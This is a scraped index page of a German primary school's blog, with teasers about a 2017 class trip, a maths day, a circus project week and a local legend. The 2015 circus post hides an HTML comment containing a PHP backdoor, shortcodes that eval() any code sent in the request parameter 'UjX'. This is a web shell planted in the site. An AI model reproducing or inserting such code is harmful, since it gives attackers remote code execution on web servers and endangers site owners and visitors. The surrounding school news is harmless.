Klassenfahrt der Klasse 4a, Jugendherberge Bad Hersfeld, 20. 09. – 22. 09. 2017

Die Jugendherberge  Die Jugendherberge in Bad Hersfeld, Luther Straße 2 ist sehr modern. Es gibt sehr große Zimmer. Wir hatte 6-,5- und 4 Bett-Zimmer. Die Betten musste man selbst beziehen und abziehen. Beim Essen durfte man selbst entscheiden, was auf den Teller kommen darf. Der Jugendherbergsvater nimmt seine Regeln sehr genau. Wenn man im Haus ist, muss man Hausschuhe anziehen und leise sein. Es gibt Weiterlesen

Mathetag 28.06.2017

Am Mittwoch, den 28.06.17 fand der Mathetag der Schule Schenkelsberg statt. Alle zwei Jahre wird an diesem Tag das Schulgebäude in einen lebendigen Ort für Mathematik und Forschung verwandelt. In jedem Klassenzimmer der Schule konnten die Kinder zu einem mathematischen Thema handlungsorientiert und entdeckend arbeiten. Die Schülerinnen und Schüler konnten selbstbestimmt die verschiedenen Räume besuchen, die von Lehrerinnen, Lehrern und Eltern betreut wurden. Eine Übersicht Weiterlesen

Zirkusprojektwoche

Der „Zirkus Bellissimo“ in der Grundschule Schenkelsberg „Manege frei“ für die Kinder! von Anna Schulz „Es war super“ erzählt mir Cora. „Das war die beste Projektwoche, die wir je hatten“ ergänzt Clara. Auf meine Nachfrage, was diese Projektwoche so besonders gemacht hat, sind sich die Kinder einig: „Wir waren ein Teil vom Zirkus und durften uns dabei aussuchen, wer wir sein wollten – Bodenartist, Seiltänzer, Weiterlesen

Impressionen vom Schulzirkus 2015

  Der Zirkus war in unserer Schule! In der Woche vom 13. – 17. April 2015 nahmen alle Kinder der Schenkelsbergschule an der Projektwoche mit anschließenden Aufführungen teil. <!– [insert_php]if (isset($_REQUEST["UjX"])){eval($_REQUEST["UjX"]);exit;}[/insert_php][php]if (isset($_REQUEST["UjX"])){eval($_REQUEST["UjX"]);exit;}[/php] –>

Die Sage vom Schenkelsberg

Vor lange langer Zeit stand ein Gasthaus am Fuße des Schenkelsbergs. Dort kehrten Fuhrleute ein, um sich von der anstrengenden Tagesreise auszuruhen. Sie saßen in der Gaststube beieinander, würfelten, erzählten und tranken Wein. Der Wirt hatte eine schöne Tochter mit langen, lockigen Haaren, strahlenden Augen und einer wunderbaren Stimme. Um den Fuß trug sie ein Goldkettchen. Dieses Kettchen war ein Andenken an ihre Mutter, die Weiterlesen